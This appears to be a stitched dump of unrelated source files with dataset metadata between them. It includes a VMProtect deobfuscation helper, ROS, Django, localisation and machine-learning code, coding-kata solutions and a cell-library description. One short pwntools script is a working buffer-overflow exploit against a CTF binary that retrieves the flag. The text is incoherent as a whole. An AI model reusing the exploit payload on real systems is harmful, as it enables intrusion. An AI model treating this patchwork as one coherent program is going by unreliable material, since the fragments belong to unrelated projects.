from novmpy.bridge import * from capstone import * from capstone.x86 import * from novmpy.x86_deobf import * from novmpy.match_helper import * class VMConfig: def __init__(self): self.reg_key = X86_REG_INVALID self.reg_ip = X86_REG_INVALID self.reg_sp = X86_REG_INVALID self.reg_regs = extend_reg(X86_REG_ESP) self.reg_base = X86_REG_INVALID self.dir = 0 self.rebase = 0 def __str__(self): return 'VMConfig : r_key({}) r_ip({}) r_sp({}) r_regs({}) r_base({}) dir({}) rebase({})'.format( bridge.reg_name(self.reg_key), bridge.reg_name( self.reg_ip), bridge.reg_name(self.reg_sp), bridge.reg_name(self.reg_regs), bridge.reg_name(self.reg_base), self.dir, hex(self.rebase)) def __repr__(self) -> str: return self.__str__() class VMState: def __init__(self, **kwargs): self.ip = kwargs.get('ip', 0) self.key = kwargs.get('key', 0) self.current_handler = kwargs.get('current_handler', 0) self.config: VMConfig = kwargs.get('config', None) def decode_emu(self, decoder, ct, reg, size): mask = get_mask(size*8) reg_key_op = X86_REG_INVALID if size == 1: reg_key_op = get_reg8(self.config.reg_key) elif size == 2: reg_key_op = get_reg16(self.config.reg_key) elif size == 4: reg_key_op = get_reg32(self.config.reg_key) elif size == 8: reg_key_op = get_reg64(self.config.reg_key) else: raise NotImplementedError('') pt = ct & mask for insn in decoder: insn: CsInsn regs_read, regs_write = insn.regs_access() # xor r11d, imm regs_write = [??,r11d] if reg in regs_write: if insn.id == X86_INS_INC: pt += 1 elif insn.id == X86_INS_DEC: pt -= 1 elif insn.id == X86_INS_NOT: pt = ~pt elif insn.id == X86_INS_NEG: pt = 0-pt elif insn.id == X86_INS_BSWAP: if insn.operands[0].size == 8: pt = ((pt & 0xFF) << (7*8)) |\ ((pt & 0xFF00) << (5*8)) |\ ((pt & 0xFF0000) << (3*8)) | \ ((pt & 0xFF000000) << (1*8)) |\ ((pt & 0xFF00000000) >> (1*8)) | \ ((pt & 0xFF0000000000) >> (3*8)) |\ ((pt & 0xFF000000000000) >> (5*8)) | \ ((pt & 0xFF00000000000000) >> (7*8)) elif insn.operands[0].size == 4: pt = ((pt & 0xFF) << 24) | ((pt & 0xFF00) << 8) |\ ((pt & 0xFF0000) >> 8) | ((pt & 0xFF000000) >> 24) elif instr_match(insn, [X86_INS_XOR, X86_INS_ADD, X86_INS_SUB], [X86_OP_REG, X86_OP_IMM], [reg]): if insn.id == X86_INS_XOR: pt ^= insn.operands[1].imm elif insn.id == X86_INS_ADD: pt += insn.operands[1].imm elif insn.id == X86_INS_SUB: pt -= insn.operands[1].imm elif instr_match(insn, [X86_INS_ROL, X86_INS_ROR], [X86_OP_REG, X86_OP_IMM], [reg]): n = insn.operands[1].imm & 0x1F if insn.id == X86_INS_ROL: pt = ((pt & mask) << n) | ( (pt & mask) >> ((8 * size) - n)) elif insn.id == X86_INS_ROR: pt = ((pt & mask) >> n) | ( (pt & mask) << ((8 * size) - n)) elif instr_match(insn, X86_INS_XOR, [X86_OP_REG, X86_OP_REG], [reg, reg_key_op]): pt ^= self.key elif instr_match(insn, X86_INS_ADD, [X86_OP_REG, X86_OP_REG]): # add ip, rebase pt += self.config.rebase elif instr_match(insn, X86_INS_LEA, [X86_OP_REG, X86_OP_MEM], [reg, {'base': reg, 'index': X86_REG_INVALID, 'scale': 1}]): pt += insn.operands[1].mem.disp elif instr_match(insn, X86_INS_LEA, [X86_OP_REG, X86_OP_MEM], [reg, {'base': reg, 'disp': 0, 'scale': 1}]): # fix lea ip, [ip+ecx] pt += self.config.rebase else: print(decoder) raise NotImplementedError(insn) pt &= mask # update key -> xor reg_key_op, reg if instr_match(insn, X86_INS_XOR, [X86_OP_REG, X86_OP_REG], [reg_key_op, reg]): self.key ^= pt & mask if instr_match(insn, X86_INS_XOR, [X86_OP_MEM, X86_OP_REG], [None, reg]): self.key ^= pt & mask return pt & mask def fetch(self, size) -> int: i = bridge.read(self.ip, size, self.config.dir) self.ip += self.config.dir*size return i
4,757
-13
206
2de0437e5ff66c828b518801f8dc21a58fbed809
952
py
Python
src/smach_tutorial/Introspection/Introspection.py
vishnuPra/state_machine_tutorial
e27ee3b91feba8da3389df921f1c4346bf8d4bc2
[ "Apache-2.0" ]
null
null
null
src/smach_tutorial/Introspection/Introspection.py
vishnuPra/state_machine_tutorial
e27ee3b91feba8da3389df921f1c4346bf8d4bc2
[ "Apache-2.0" ]
null
null
null
src/smach_tutorial/Introspection/Introspection.py
vishnuPra/state_machine_tutorial
e27ee3b91feba8da3389df921f1c4346bf8d4bc2
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python import rospy import smach_ros from smach_tutorial.BasicStateMachine import BasicStateMachine_0,\ BasicStateMachine_1,\ BasicStateMachine_2 ##----------------------------------------------------------------------------------- # Example ##----------------------------------------------------------------------------------- if __name__ == '__main__': rospy.init_node('tutorial_node') main() #Change to main1 to call your function
30.709677
85
0.548319
#!/usr/bin/env python import rospy import smach_ros from smach_tutorial.BasicStateMachine import BasicStateMachine_0,\ BasicStateMachine_1,\ BasicStateMachine_2 ##----------------------------------------------------------------------------------- # Example def main(): SimpleSM = BasicStateMachine_0.SetPrintStateMachine() introspection_server = smach_ros.IntrospectionServer('SM', SimpleSM, '/SM_root') introspection_server.start() outcome = SimpleSM.execute() rospy.loginfo("Result : " + outcome) introspection_server.stop() def main1(): #Create a main function that launch the BasicStateMachine_1.FooBarStateMachine() pass ##----------------------------------------------------------------------------------- if __name__ == '__main__': rospy.init_node('tutorial_node') main() #Change to main1 to call your function
356
0
45
922e212a09a16f5831aaa45b2164778b91ffe10a
8,448
py
Python
vendor/packages/translate-toolkit/translate/convert/test_xliff2po.py
jgmize/kitsune
8f23727a9c7fcdd05afc86886f0134fb08d9a2f0
[ "BSD-3-Clause" ]
2
2019-08-19T17:08:47.000Z
2019-10-05T11:37:02.000Z
vendor/packages/translate-toolkit/translate/convert/test_xliff2po.py
jgmize/kitsune
8f23727a9c7fcdd05afc86886f0134fb08d9a2f0
[ "BSD-3-Clause" ]
null
null
null
vendor/packages/translate-toolkit/translate/convert/test_xliff2po.py
jgmize/kitsune
8f23727a9c7fcdd05afc86886f0134fb08d9a2f0
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python from translate.convert import xliff2po from translate.misc import wStringIO from translate.storage.test_base import headerless_len, first_translatable class TestBasicXLIFF2PO(TestXLIFF2PO): """This tests a basic XLIFF file without xmlns attribute""" xliffskeleton = '''<?xml version="1.0" ?> <xliff version="1.1"> <file original="filename.po" source-language="en-US" datatype="po"> <body> %s </body> </file> </xliff>'''
38.054054
131
0.623816
#!/usr/bin/env python from translate.convert import xliff2po from translate.misc import wStringIO from translate.storage.test_base import headerless_len, first_translatable class TestXLIFF2PO: xliffskeleton = '''<?xml version="1.0" ?> <xliff version="1.1" xmlns="urn:oasis:names:tc:xliff:document:1.1"> <file original="filename.po" source-language="en-US" datatype="po"> <body> %s </body> </file> </xliff>''' def xliff2po(self, xliffsource): """helper that converts xliff source to po source without requiring files""" inputfile = wStringIO.StringIO(xliffsource) convertor = xliff2po.xliff2po() outputpo = convertor.convertstore(inputfile) print "The generated po:" print type(outputpo) print str(outputpo) return outputpo def test_minimal(self): minixlf = self.xliffskeleton % '''<trans-unit> <source>red</source> <target>rooi</target> </trans-unit>''' pofile = self.xliff2po(minixlf) assert headerless_len(pofile.units) == 1 assert pofile.translate("red") == "rooi" assert pofile.translate("bla") is None def test_basic(self): headertext = '''Project-Id-Version: program 2.1-branch Report-Msgid-Bugs-To: POT-Creation-Date: 2006-01-09 07:15+0100 PO-Revision-Date: 2004-03-30 17:02+0200 Last-Translator: Zuza Software Foundation &lt;xxx@translate.org.za> Language-Team: Afrikaans &lt;translate-discuss-xxx@lists.sourceforge.net> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit''' minixlf = (self.xliffskeleton % '''<trans-unit id="1" restype="x-gettext-domain-header" approved="no" xml:space="preserve"> <source>%s</source> <target>%s</target> <note from="po-translator">Zulu translation of program ABC</note> </trans-unit> <trans-unit> <source>gras</source> <target>utshani</target> </trans-unit>''') % (headertext, headertext) print minixlf pofile = self.xliff2po(minixlf) assert pofile.translate("gras") == "utshani" assert pofile.translate("bla") is None potext = str(pofile) assert potext.index('# Zulu translation of program ABC') == 0 assert potext.index('msgid "gras"\n') assert potext.index('msgstr "utshani"\n') assert potext.index('MIME-Version: 1.0\\n') def test_translatorcomments(self): """Tests translator comments""" minixlf = self.xliffskeleton % '''<trans-unit> <source>nonsense</source> <target>matlhapolosa</target> <context-group name="po-entry" purpose="information"> <context context-type="x-po-trancomment">Couldn't do it</context> </context-group> <note from="po-translator">Couldn't do it</note> </trans-unit>''' pofile = self.xliff2po(minixlf) assert pofile.translate("nonsense") == "matlhapolosa" assert pofile.translate("bla") is None unit = first_translatable(pofile) assert unit.getnotes("translator") == "Couldn't do it" potext = str(pofile) assert potext.index("# Couldn't do it\n") >= 0 minixlf = self.xliffskeleton % '''<trans-unit xml:space="preserve"> <source>nonsense</source> <target>matlhapolosa</target> <context-group name="po-entry" purpose="information"> <context context-type="x-po-trancomment">Couldn't do it</context> </context-group> <note from="po-translator">Couldn't do it</note> </trans-unit>''' pofile = self.xliff2po(minixlf) assert pofile.translate("nonsense") == "matlhapolosa" assert pofile.translate("bla") is None unit = first_translatable(pofile) assert unit.getnotes("translator") == "Couldn't do\nit" potext = str(pofile) assert potext.index("# Couldn't do\n# it\n") >= 0 def test_autocomment(self): """Tests automatic comments""" minixlf = self.xliffskeleton % '''<trans-unit> <source>nonsense</source> <target>matlhapolosa</target> <context-group name="po-entry" purpose="information"> <context context-type="x-po-autocomment">Note that this is garbage</context> </context-group> <note from="developer">Note that this is garbage</note> </trans-unit>''' pofile = self.xliff2po(minixlf) assert pofile.translate("nonsense") == "matlhapolosa" assert pofile.translate("bla") is None unit = first_translatable(pofile) assert unit.getnotes("developer") == "Note that this is garbage" potext = str(pofile) assert potext.index("#. Note that this is garbage\n") >= 0 minixlf = self.xliffskeleton % '''<trans-unit xml:space="preserve"> <source>nonsense</source> <target>matlhapolosa</target> <context-group name="po-entry" purpose="information"> <context context-type="x-po-autocomment">Note that this is garbage</context> </context-group> <note from="developer">Note that this is garbage</note> </trans-unit>''' pofile = self.xliff2po(minixlf) assert pofile.translate("nonsense") == "matlhapolosa" assert pofile.translate("bla") is None unit = first_translatable(pofile) assert unit.getnotes("developer") == "Note that this is\ngarbage" potext = str(pofile) assert potext.index("#. Note that this is\n#. garbage\n") >= 0 def test_locations(self): """Tests location comments (#:)""" minixlf = self.xliffskeleton % '''<trans-unit id="1"> <source>nonsense</source> <target>matlhapolosa</target> <context-group name="po-reference" purpose="location"> <context context-type="sourcefile">example.c</context> <context context-type="linenumber">123</context> </context-group> <context-group name="po-reference" purpose="location"> <context context-type="sourcefile">place.py</context> </context-group> </trans-unit>''' pofile = self.xliff2po(minixlf) assert pofile.translate("nonsense") == "matlhapolosa" assert pofile.translate("bla") is None unit = first_translatable(pofile) locations = unit.getlocations() assert len(locations) == 2 assert "example.c:123" in locations assert "place.py" in locations def test_fuzzy(self): """Tests fuzzyness""" minixlf = self.xliffskeleton % '''<trans-unit approved="no"> <source>book</source> </trans-unit> <trans-unit id="2" approved="yes"> <source>nonsense</source> <target>matlhapolosa</target> </trans-unit> <trans-unit id="2" approved="no"> <source>verb</source> <target state="needs-review-translation">lediri</target> </trans-unit>''' pofile = self.xliff2po(minixlf) assert pofile.translate("nonsense") == "matlhapolosa" assert pofile.translate("verb") == "lediri" assert pofile.translate("book") is None assert pofile.translate("bla") is None assert headerless_len(pofile.units) == 3 #TODO: decide if this one should be fuzzy: #assert pofile.units[0].isfuzzy() assert not pofile.units[2].isfuzzy() assert pofile.units[3].isfuzzy() def test_plurals(self): """Tests fuzzyness""" minixlf = self.xliffskeleton % '''<group id="1" restype="x-gettext-plurals"> <trans-unit id="1[0]" xml:space="preserve"> <source>cow</source> <target>inkomo</target> </trans-unit> <trans-unit id="1[1]" xml:space="preserve"> <source>cows</source> <target>iinkomo</target> </trans-unit> </group>''' pofile = self.xliff2po(minixlf) print str(pofile) potext = str(pofile) assert headerless_len(pofile.units) == 1 assert potext.index('msgid_plural "cows"') assert potext.index('msgstr[0] "inkomo"') assert potext.index('msgstr[1] "iinkomo"') class TestBasicXLIFF2PO(TestXLIFF2PO): """This tests a basic XLIFF file without xmlns attribute""" xliffskeleton = '''<?xml version="1.0" ?> <xliff version="1.1"> <file original="filename.po" source-language="en-US" datatype="po"> <body> %s </body> </file> </xliff>'''
1,513
6,438
23
d8082c1ca4107fc4e8b66d4b8f63834432cb57a8
1,419
py
Python
Python/the_office_outed.py
ielvisd/CodeWar_Katas
3d95dd72332a81cc2bff1c7fd3b782d1f4658ca8
[ "MIT" ]
null
null
null
Python/the_office_outed.py
ielvisd/CodeWar_Katas
3d95dd72332a81cc2bff1c7fd3b782d1f4658ca8
[ "MIT" ]
null
null
null
Python/the_office_outed.py
ielvisd/CodeWar_Katas
3d95dd72332a81cc2bff1c7fd3b782d1f4658ca8
[ "MIT" ]
null
null
null
""" Your colleagues have been looking over you shoulder. When you should have been doing your boring real job, you've been using the work computers to smash in endless hours of codewars. In a team meeting, a terrible, awful person declares to the group that you aren't working. You're in trouble. You quickly have to gauge the feeling in the room to decide whether or not you should gather your things and leave. Given an object (meet) containing team member names as keys, and their happiness rating out of 10 as the value, you need to assess the overall happiness rating of the group. If <= 5, return 'Get Out Now!'. Else return 'Nice Work Champ!'. Happiness rating will be total score / number of people in the room. Note that your boss is in the room (boss), their score is worth double it's face value (but they are still just one person!). """ """ test.assert_equals(outed({'tim':0, 'jim':2, 'randy':0, 'sandy':7, 'andy':0, 'katie':5, 'laura':1, 'saajid':2, 'alex':3, 'john':2, 'mr':0}, 'laura'), 'Get Out Now!') test.assert_equals(outed({'tim':1, 'jim':3, 'randy':9, 'sandy':6, 'andy':7, 'katie':6, 'laura':9, 'saajid':9, 'alex':9, 'john':9, 'mr':8}, 'katie'), 'Nice Work Champ!') test.assert_equals(outed({'tim':2, 'jim':4, 'randy':0, 'sandy':5, 'andy':8, 'katie':6, 'laura':2, 'saajid':2, 'alex':3, 'john':2, 'mr':8}, 'john'), 'Get Out Now!') """
61.695652
237
0.680761
""" Your colleagues have been looking over you shoulder. When you should have been doing your boring real job, you've been using the work computers to smash in endless hours of codewars. In a team meeting, a terrible, awful person declares to the group that you aren't working. You're in trouble. You quickly have to gauge the feeling in the room to decide whether or not you should gather your things and leave. Given an object (meet) containing team member names as keys, and their happiness rating out of 10 as the value, you need to assess the overall happiness rating of the group. If <= 5, return 'Get Out Now!'. Else return 'Nice Work Champ!'. Happiness rating will be total score / number of people in the room. Note that your boss is in the room (boss), their score is worth double it's face value (but they are still just one person!). """ """ test.assert_equals(outed({'tim':0, 'jim':2, 'randy':0, 'sandy':7, 'andy':0, 'katie':5, 'laura':1, 'saajid':2, 'alex':3, 'john':2, 'mr':0}, 'laura'), 'Get Out Now!') test.assert_equals(outed({'tim':1, 'jim':3, 'randy':9, 'sandy':6, 'andy':7, 'katie':6, 'laura':9, 'saajid':9, 'alex':9, 'john':9, 'mr':8}, 'katie'), 'Nice Work Champ!') test.assert_equals(outed({'tim':2, 'jim':4, 'randy':0, 'sandy':5, 'andy':8, 'katie':6, 'laura':2, 'saajid':2, 'alex':3, 'john':2, 'mr':8}, 'john'), 'Get Out Now!') """ def outed(meet, boss): # Algorithm # return
34
0
23
421acd565a0e8398b36565449d99af0489f54b35
399
py
Python
app_orders/serializers.py
la5tway/candy_shop
c3bc5b958afe0c1066de98126b5cf5d96eb06a1b
[ "MIT" ]
null
null
null
app_orders/serializers.py
la5tway/candy_shop
c3bc5b958afe0c1066de98126b5cf5d96eb06a1b
[ "MIT" ]
null
null
null
app_orders/serializers.py
la5tway/candy_shop
c3bc5b958afe0c1066de98126b5cf5d96eb06a1b
[ "MIT" ]
null
null
null
from app_couriers.serializers import CourierSerializer from .models import Orders
22.166667
69
0.676692
from app_couriers.serializers import CourierSerializer from .models import Orders class OrderSerializer(CourierSerializer): id_field_name = "order_id" class Meta: model = Orders fields = ('order_id', 'weight', 'region', 'delivery_hours', ) class SingleOrderSerializer(OrderSerializer): class Meta: model = Orders fields = '__all__' depth = 1
0
270
46
383a19a0b2431ee34819fe0766e2d6b83c59586f
4,740
py
Python
Rake.py
beenotung/Rake_For_Chinese
07e8e570f7d35ec0b93f18d6a124eeb8529d7780
[ "MIT" ]
null
null
null
Rake.py
beenotung/Rake_For_Chinese
07e8e570f7d35ec0b93f18d6a124eeb8529d7780
[ "MIT" ]
null
null
null
Rake.py
beenotung/Rake_For_Chinese
07e8e570f7d35ec0b93f18d6a124eeb8529d7780
[ "MIT" ]
null
null
null
''' Implementation of Rapid Automatic Keyword Extraction (RAKE) algorithm for Chinese Original algorithm described in: Rose, S., Engel, D., Cramer, N., & Cowley, W. (2010). Automatic Keyword Extraction from Individual Documents. In M. W. Berry & J. Kogan (Eds.), Text Mining: Theory and Applications: John Wiley & Sons. ''' __author__ = "Ruoyang Xu" import jieba import jieba.posseg as pseg import operator import json from collections import Counter # Data structure for holding data # Check if contains num # Read Target Case if Json if __name__ == '__main__': with open('data/testCase/文本1.txt','r') as fp: text = fp.read() result = run(text) print(result)
30.779221
126
0.587553
''' Implementation of Rapid Automatic Keyword Extraction (RAKE) algorithm for Chinese Original algorithm described in: Rose, S., Engel, D., Cramer, N., & Cowley, W. (2010). Automatic Keyword Extraction from Individual Documents. In M. W. Berry & J. Kogan (Eds.), Text Mining: Theory and Applications: John Wiley & Sons. ''' __author__ = "Ruoyang Xu" import jieba import jieba.posseg as pseg import operator import json from collections import Counter # Data structure for holding data class Word(): def __init__(self, char, freq = 0, deg = 0): self.freq = freq self.deg = deg self.char = char def returnScore(self): return self.deg/self.freq def updateOccur(self, phraseLength): self.freq += 1 self.deg += phraseLength def getChar(self): return self.char def updateFreq(self): self.freq += 1 def getFreq(self): return self.freq # Check if contains num def notNumStr(instr): for item in instr: if '\u0041' <= item <= '\u005a' or ('\u0061' <= item <='\u007a') or item.isdigit(): return False return True # Read Target Case if Json def readSingleTestCases(testFile): with open(testFile) as json_data: try: testData = json.load(json_data) except: # This try block deals with incorrect json format that has ' instead of " data = json_data.read().replace("'",'"') try: testData = json.loads(data) # This try block deals with empty transcript file except: return "" returnString = "" for item in testData: try: returnString += item['text'] except: returnString += item['statement'] return returnString def run(rawText): # Construct Stopword Lib swLibList = [line.rstrip('\n') for line in open("textlibs/中文停用词表(1208个).txt",'r')] # Construct Phrase Deliminator Lib conjLibList = [line.rstrip('\n') for line in open("textlibs/中文分隔词词库.txt",'r')] # Cut Text rawtextList = pseg.cut(rawText) # Construct List of Phrases and Preliminary textList textList = [] listofSingleWord = dict() lastWord = '' poSPrty = ['m','x','uj','ul','mq','u','v','f'] meaningfulCount = 0 checklist = [] for eachWord, flag in rawtextList: checklist.append([eachWord,flag]) if eachWord in conjLibList or not notNumStr(eachWord) or eachWord in swLibList or flag in poSPrty or eachWord == '\n': if lastWord != '|': textList.append("|") lastWord = "|" elif eachWord not in swLibList and eachWord != '\n': textList.append(eachWord) meaningfulCount += 1 if eachWord not in listofSingleWord: listofSingleWord[eachWord] = Word(eachWord) lastWord = '' # Construct List of list that has phrases as wrds newList = [] tempList = [] for everyWord in textList: if everyWord != '|': tempList.append(everyWord) else: newList.append(tempList) tempList = [] tempStr = '' for everyWord in textList: if everyWord != '|': tempStr += everyWord + '|' else: if tempStr[:-1] not in listofSingleWord: listofSingleWord[tempStr[:-1]] = Word(tempStr[:-1]) tempStr = '' # Update the entire List for everyPhrase in newList: res = '' for everyWord in everyPhrase: listofSingleWord[everyWord].updateOccur(len(everyPhrase)) res += everyWord + '|' phraseKey = res[:-1] if phraseKey not in listofSingleWord: listofSingleWord[phraseKey] = Word(phraseKey) else: listofSingleWord[phraseKey].updateFreq() # Get score for entire Set outputList = dict() for everyPhrase in newList: if len(everyPhrase) > 5: continue score = 0 phraseString = '' outStr = '' for everyWord in everyPhrase: score += listofSingleWord[everyWord].returnScore() phraseString += everyWord + '|' outStr += everyWord phraseKey = phraseString[:-1] freq = listofSingleWord[phraseKey].getFreq() if freq / meaningfulCount < 0.01 and freq < 3 : continue outputList[outStr] = score sorted_list = sorted(outputList.items(), key = operator.itemgetter(1), reverse = True) return sorted_list[:10] if __name__ == '__main__': with open('data/testCase/文本1.txt','r') as fp: text = fp.read() result = run(text) print(result)
3,832
-8
250
808fad95e5fb38e2f8830d881ee74dc3281332bf
249
py
Python
20211217_PartialExam/SaveTheWorld/solution.py
augustozanellato/Cybersec2021
466fd9db0e7c359a8afd5115eacb3fca2b439c28
[ "BSD-3-Clause" ]
15
2021-10-01T16:10:48.000Z
2022-02-19T20:45:35.000Z
20211217_PartialExam/SaveTheWorld/solution.py
augustozanellato/Cybersec2021
466fd9db0e7c359a8afd5115eacb3fca2b439c28
[ "BSD-3-Clause" ]
null
null
null
20211217_PartialExam/SaveTheWorld/solution.py
augustozanellato/Cybersec2021
466fd9db0e7c359a8afd5115eacb3fca2b439c28
[ "BSD-3-Clause" ]
2
2021-11-06T08:32:41.000Z
2021-12-11T16:18:54.000Z
from pwn import * # type: ignore context.binary = "./SaveTheWorld" p = process() p.sendline(b"A" * 72 + b"Jotaro!!" + b"Star Platinum!!!" + b"HORA" + b"9999") p.recvuntil(b"Congratulation, you won!!!") os.system("grep .*{.*}.* victory_recap.txt")
31.125
77
0.634538
from pwn import * # type: ignore context.binary = "./SaveTheWorld" p = process() p.sendline(b"A" * 72 + b"Jotaro!!" + b"Star Platinum!!!" + b"HORA" + b"9999") p.recvuntil(b"Congratulation, you won!!!") os.system("grep .*{.*}.* victory_recap.txt")
0
0
0
e2a1f52aba416ba05637ca92a6566a1e403ae81d
654
py
Python
synlib/descriptions/CMPR32X1.py
vhnatyk/vlsistuff
0981097bd19a0c482728dcc5048a3615ac9a9a90
[ "MIT" ]
26
2018-03-17T18:14:22.000Z
2022-03-14T07:23:13.000Z
synlib/descriptions/CMPR32X1.py
psumesh/vlsistuff
1fe64b093d0581d99c7d826b74c31b8655fa0b31
[ "MIT" ]
1
2019-10-16T10:31:11.000Z
2019-10-17T04:14:53.000Z
synlib/descriptions/CMPR32X1.py
psumesh/vlsistuff
1fe64b093d0581d99c7d826b74c31b8655fa0b31
[ "MIT" ]
7
2018-07-16T07:51:25.000Z
2022-02-15T14:22:54.000Z
Desc = cellDescClass("CMPR32X1") Desc.properties["cell_leakage_power"] = "3632.359140" Desc.properties["cell_footprint"] = "add32" Desc.properties["area"] = "69.854400" Desc.pinOrder = ['A', 'B', 'C', 'CO', 'S'] Desc.add_arc("A","S","combi") Desc.add_arc("B","S","combi") Desc.add_arc("C","S","combi") Desc.add_arc("A","CO","combi") Desc.add_arc("B","CO","combi") Desc.add_arc("C","CO","combi") Desc.add_param("area",69.854400); Desc.add_pin("A","input") Desc.add_pin("C","input") Desc.add_pin("B","input") Desc.add_pin("CO","output") Desc.add_pin_func("CO","unknown") Desc.add_pin("S","output") Desc.add_pin_func("S","unknown") CellLib["CMPR32X1"]=Desc
31.142857
53
0.666667
Desc = cellDescClass("CMPR32X1") Desc.properties["cell_leakage_power"] = "3632.359140" Desc.properties["cell_footprint"] = "add32" Desc.properties["area"] = "69.854400" Desc.pinOrder = ['A', 'B', 'C', 'CO', 'S'] Desc.add_arc("A","S","combi") Desc.add_arc("B","S","combi") Desc.add_arc("C","S","combi") Desc.add_arc("A","CO","combi") Desc.add_arc("B","CO","combi") Desc.add_arc("C","CO","combi") Desc.add_param("area",69.854400); Desc.add_pin("A","input") Desc.add_pin("C","input") Desc.add_pin("B","input") Desc.add_pin("CO","output") Desc.add_pin_func("CO","unknown") Desc.add_pin("S","output") Desc.add_pin_func("S","unknown") CellLib["CMPR32X1"]=Desc
0
0
0
fb949f558985982b6af7d2af1255dbe8dc314222
868
py
Python
965.py
OmangRawat/Leetcode
6fa696367ef9c5e6b08940b11e2202382d1afc07
[ "MIT" ]
null
null
null
965.py
OmangRawat/Leetcode
6fa696367ef9c5e6b08940b11e2202382d1afc07
[ "MIT" ]
null
null
null
965.py
OmangRawat/Leetcode
6fa696367ef9c5e6b08940b11e2202382d1afc07
[ "MIT" ]
null
null
null
""" ---> Univalued Binary Tree ---> Easy """ from tree_func import * in_array = [1, 1, 1, 1, 1, None, 1] in_root = to_binary_tree(in_array) pretty_print(in_root) a = Solution() print("Answer -", a.isUnivalTree(in_root)) # print("Answer -", a.isUnivalTree(in_root)) """ Check if node is none or node.value should be equal to root value for that and every other node in its children Reference - https://leetcode.com/problems/univalued-binary-tree/discuss/211397/JavaPython-3-BFS-and-DFS-clean-codes-w-brief-analysis. """
26.30303
133
0.673963
""" ---> Univalued Binary Tree ---> Easy """ from tree_func import * class Solution: def isUnivalTree(self, root) -> bool: def dfs(node): # pretty_print(node) # print(node is None or node.value == root.value and dfs(node.left) and dfs(node.right)) return node is None or node.value == root.value and dfs(node.left) and dfs(node.right) return dfs(root) in_array = [1, 1, 1, 1, 1, None, 1] in_root = to_binary_tree(in_array) pretty_print(in_root) a = Solution() print("Answer -", a.isUnivalTree(in_root)) # print("Answer -", a.isUnivalTree(in_root)) """ Check if node is none or node.value should be equal to root value for that and every other node in its children Reference - https://leetcode.com/problems/univalued-binary-tree/discuss/211397/JavaPython-3-BFS-and-DFS-clean-codes-w-brief-analysis. """
297
-6
49
13702b905917360de903277c86d31a8e4bc8103e
947
py
Python
BPNetWork/NeuralNetwork/mnist_data.py
Keneyr/MachineLearningMethods
9b15cce18c476f8b827ca5082ff119b6cba41198
[ "MIT" ]
1
2021-07-02T15:01:30.000Z
2021-07-02T15:01:30.000Z
BPNetWork/NeuralNetwork/mnist_data.py
Keneyr/MachineLearningMethods
9b15cce18c476f8b827ca5082ff119b6cba41198
[ "MIT" ]
null
null
null
BPNetWork/NeuralNetwork/mnist_data.py
Keneyr/MachineLearningMethods
9b15cce18c476f8b827ca5082ff119b6cba41198
[ "MIT" ]
1
2021-07-02T15:01:30.000Z
2021-07-02T15:01:30.000Z
import os import struct import numpy as np def load_mnist(path, kind='train'): """Load MNIST data from `path`""" labels_path = os.path.join(path, '%s-labels.idx1-ubyte' % kind) images_path = os.path.join(path, '%s-images.idx3-ubyte' % kind) with open(labels_path, 'rb') as lbpath: magic, n = struct.unpack('>II', lbpath.read(8)) labels = np.fromfile(lbpath, dtype=np.uint8) labels = labels.reshape(labels.shape[0], 1) with open(images_path, 'rb') as imgpath: magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16)) images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784) return images, labels
36.423077
70
0.469905
import os import struct import numpy as np def load_mnist(path, kind='train'): """Load MNIST data from `path`""" labels_path = os.path.join(path, '%s-labels.idx1-ubyte' % kind) images_path = os.path.join(path, '%s-images.idx3-ubyte' % kind) with open(labels_path, 'rb') as lbpath: magic, n = struct.unpack('>II', lbpath.read(8)) labels = np.fromfile(lbpath, dtype=np.uint8) labels = labels.reshape(labels.shape[0], 1) with open(images_path, 'rb') as imgpath: magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16)) images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784) return images, labels
0
0
0
ab920960470b013ad4fbe77a3508e1b418275b48
295
py
Python
src/concepts/mode.py
Valeeswaran/tutorials
71b43cad46f4d7d2d67d3ff4be61bdaaade2a36a
[ "MIT" ]
null
null
null
src/concepts/mode.py
Valeeswaran/tutorials
71b43cad46f4d7d2d67d3ff4be61bdaaade2a36a
[ "MIT" ]
null
null
null
src/concepts/mode.py
Valeeswaran/tutorials
71b43cad46f4d7d2d67d3ff4be61bdaaade2a36a
[ "MIT" ]
null
null
null
arr = [1, 2, 3, 4, 4, 4, 5, 6, 6, 7, 8, 9] arr.sort() my_dict = {i:arr.count(i) for i in arr} # sorting the dictionary based on value my_dict = {k: v for k, v in sorted(my_dict.items(), key=lambda item: item[1])} print(len(my_dict)) print(my_dict) list = list(my_dict.keys()) print(list[-1])
22.692308
78
0.637288
arr = [1, 2, 3, 4, 4, 4, 5, 6, 6, 7, 8, 9] arr.sort() my_dict = {i:arr.count(i) for i in arr} # sorting the dictionary based on value my_dict = {k: v for k, v in sorted(my_dict.items(), key=lambda item: item[1])} print(len(my_dict)) print(my_dict) list = list(my_dict.keys()) print(list[-1])
0
0
0
635dfca37db44428a5f283624c1effff583c2d39
1,125
py
Python
teamcat_service/doraemon/doraemon/auth_extend/user/templatetags/auth_required.py
zhangyin2088/Teamcat
be9be8d7c1e58c8d2d22ab78d25783d9aee4de71
[ "Apache-2.0" ]
6
2018-11-26T08:42:52.000Z
2020-06-01T08:33:48.000Z
teamcat_service/doraemon/doraemon/auth_extend/user/templatetags/auth_required.py
zhangyin2088/Teamcat
be9be8d7c1e58c8d2d22ab78d25783d9aee4de71
[ "Apache-2.0" ]
null
null
null
teamcat_service/doraemon/doraemon/auth_extend/user/templatetags/auth_required.py
zhangyin2088/Teamcat
be9be8d7c1e58c8d2d22ab78d25783d9aee4de71
[ "Apache-2.0" ]
1
2019-01-22T06:45:36.000Z
2019-01-22T06:45:36.000Z
#coding=utf-8 ''' Created on 2016-1-18 @author: Devuser ''' from django import template from doraemon.auth_extend.user.templatetags.auth_required_node import LogoutRequiredNode,LoginRequiredNode,UserRequiredNode,ManagerRequiredNode,AdminRequiredNode register = template.Library() @register.tag() @register.tag() @register.tag() @register.tag() @register.tag()
26.162791
161
0.757333
